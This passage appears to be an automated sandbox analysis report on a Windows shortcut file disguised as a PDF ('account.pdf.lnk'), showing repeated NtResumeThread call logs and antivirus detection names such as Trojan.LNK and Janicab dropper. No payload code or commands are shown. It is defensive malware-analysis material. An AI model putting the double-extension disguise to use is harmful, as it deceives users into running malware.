NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:35 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2708	1	0	0

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

MicroWorld-eScan	Trojan.LNK.Droid.2.Gen
FireEye	Trojan.LNK.Droid.2.Gen
Arcabit	Trojan.LNK.Droid.2.Gen [many]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Trojan.LNK.Droid.2.Gen
Emsisoft	Trojan.LNK.Droid.2.Gen (B)
F-Secure	Trojan-Dropper:W32/Janicab.A
VIPRE	Trojan.LNK.Droid.2.Gen
TrendMicro	HEUR_LNKEXEC.A
McAfee-GW-Edition	BehavesLike.Trojan.dl
Sophos	Mal/LnkDrop-A
Microsoft	Trojan:Script/Sabsik.FL.A!ml
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Trojan.LNK.Droid.2.Gen
Google	Detected
VBA32	Trojan.Link.Crafted
ALYac	GT:JS.Backdoor.2.0B1CE076
MAX	malware (ai score=88)
Zoner	Probably Heur.LNKScript
SentinelOne	Static AI - Suspicious LNK
Panda	Trj/Ghostcript.A

account.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All